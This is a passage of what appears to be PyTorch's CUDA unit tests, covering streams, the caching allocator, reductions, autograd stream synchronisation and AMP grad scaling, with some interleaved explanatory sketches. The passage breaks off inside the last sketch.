self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
device = torch.cuda.device(0)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(stream_v)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
device = torch.cuda.device(1)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(
stream_v, device=device)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
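# Illustrative sketch (not part of the test suite): record_stream() tells the caching
# allocator a tensor is still in use on another stream, so its block is not handed out
# again until that stream's pending work finishes. The sketch name is hypothetical.
def _sketch_record_stream_usage():
    side = torch.cuda.Stream()
    x = torch.ones(1024, device='cuda')             # allocated/filled on the current stream
    side.wait_stream(torch.cuda.current_stream())
    with torch.cuda.stream(side):
        y = x * 2                                   # consumed on the side stream
    x.record_stream(side)                           # defer reuse of x's block until `side` catches up
    del x                                           # block becomes reusable only after `side`'s work completes
    return y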
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
import subprocess
try:
p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
sys.exit(-1) # Should not be reached
except RuntimeError as e:
sys.exit(-2)
"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate(timeout=10)
p.wait(timeout=10)
except subprocess.TimeoutExpired as e:
p.kill()
out, err = p.communicate()
expected_messages = [
'device-side assert triggered', # CUDA
'Assertion', # CUDA
'HSA_STATUS_ERROR_EXCEPTION', # ROCm
'Device-side assertion' # ROCm
]
self.assertTrue(any([msg in out or msg in err for msg in expected_messages]))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan])
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_tensor_gather(self):
AbstractTestCases._TestTorchMixin._test_gather(self, lambda t: t.cuda(), False)
def test_tensor_scatter(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, lambda t: t.cuda())
def test_tensor_scatterFill(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
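# Illustrative sketch (not part of the test suite): the single-device analogue of the
# test above -- capturing and restoring the CUDA RNG state reproduces the same random
# sequence. The sketch name is hypothetical.
def _sketch_rng_state_roundtrip():
    state = torch.cuda.get_rng_state()
    first = torch.cuda.FloatTensor(100).normal_()
    torch.cuda.set_rng_state(state)
    second = torch.cuda.FloatTensor(100).normal_()
    assert torch.equal(first, second)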
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would overflow to a negative value,
# giving a negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Test that wrap_with_cuda_memory_check successfully detects leak
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
l.append(torch.tensor(10, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 0"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
l.append(torch.tensor(10, device=torch.device("cuda:1")))
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 1"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x, val):
ctx.val = val
ctx.stream = torch.cuda.current_stream()
return x * val
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), ctx.stream)
# delays the operation in the background stream
torch.cuda._sleep(1000 * 5000)
return grad * ctx.val, None
return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
MultiplyInStream = self._make_multiply_in_stream()
# Tests using grads outside the backward() stream context
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 2)
output.sum().backward()
# sync needed
default_stream.wait_stream(stream)
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
# Tests that using grads in the same stream context as backward()
# is safe regardless what streams bwd ops ran on
bwd_ambient_stream = torch.cuda.Stream()
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 3)
with torch.cuda.stream(bwd_ambient_stream):
bwd_ambient_stream.wait_stream(stream)
output.sum().backward()
# x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
# The end of backward() should have synced "bwd_ambient_stream" with "stream"
# so it should be safe to use x.grad here without any syncs.
self.assertEqual(x.grad, torch.ones_like(x) * 3)
self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
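# Illustrative sketch (not part of the test suite): the recipe from "Stream semantics
# of backward passes" that the test above verifies -- sync the side stream with the
# ambient stream before running backward() on it, and sync the ambient stream with the
# side stream before consuming .grad. The sketch name is hypothetical.
def _sketch_streaming_backward_recipe():
    ambient = torch.cuda.current_stream()
    side = torch.cuda.Stream()
    x = torch.randn(5, 5, device='cuda', requires_grad=True)
    side.wait_stream(ambient)
    with torch.cuda.stream(side):
        loss = (x * 2).sum()
        loss.backward()                 # backward ops run with `side` as the ambient stream
    ambient.wait_stream(side)           # required before reading x.grad on `ambient`
    return x.grad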
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
MultiplyInStream = self._make_multiply_in_stream()
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x, x_first_use_on_ambient):
if x_first_use_on_ambient:
x0 = x.clone()
self.stream0.wait_stream(torch.cuda.current_stream())
self.stream1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stream0):
if not x_first_use_on_ambient:
x0 = x.clone()
y0 = MultiplyInStream.apply(x0, 2)
self.event.record(stream=torch.cuda.current_stream())
with torch.cuda.stream(self.stream1):
y1 = MultiplyInStream.apply(x, 3)
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
for x_first_use_on_ambient in (True, False):
# the out_of_place=False, iters=1 case stresses whether proper syncs are inserted
# when grads are initially None and stolen by backward ops.
for out_of_place, iters in ((True, 1),
(False, 1),
(False, 5)):
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
model = StreamModel().cuda()
x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
stream if x_first_use_on_ambient else model.stream0))
for p in model.parameters():
self.assertTrue(p.grad is None)
for i in range(iters):
loss = model(x, x_first_use_on_ambient).sum()
if out_of_place:
x_grad = torch.autograd.grad((loss,), (x,))[0]
else:
loss.backward()
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
torch.cuda.current_stream().wait_stream(stream)
if out_of_place:
self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
else:
self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so that to()'s backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_op_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# assertEquals below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
# Tests if autograd callbacks sync properly with respect to leaf streams and
# the user-facing stream surrounding backward(). If it fails, first suspect is
# sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
MultiplyInStream = self._make_multiply_in_stream()
size = int(1e3)
a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
stash = []
# sets up a nontrivial structure of leaf streams
s0.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s0):
c = MultiplyInStream.apply(a, 2)
s1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s1):
d = MultiplyInStream.apply(b, 3)
s1.wait_stream(s0)
e = c * d
def clone_leaf_grads():
stash.append(a.grad.clone())
stash.append(b.grad.clone())
# Use a hook on e to install the callback
e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))
s2.wait_stream(s1)
with torch.cuda.stream(s2):
e.sum().backward()
# The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
# If those things happened properly, checking the values of the cloned grads on s2 should be safe:
self.assertEqual(stash[0], torch.full_like(a, 6))
self.assertEqual(stash[1], torch.full_like(a, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non-overlapping and dense
# - variants of g.clone()[:, :5] which are not non-overlapping and dense
# Non-overlapping and dense grads route into a multi-tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
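# Illustrative sketch (not part of the test suite): the public GradScaler loop that
# drives the raw _amp_update_scale_ / _amp_foreach_non_finite_check_and_unscale_ kernels
# exercised above. `model`, `optimizer`, `loss_fn` and `data` are assumed to exist; the
# sketch name is hypothetical.
def _sketch_grad_scaler_loop(model, optimizer, loss_fn, data):
    scaler = torch.cuda.amp.GradScaler()
    for input, target in data:
        optimizer.zero_grad()
        with torch.autocast('cuda'):
            loss = loss_fn(model(input), target)
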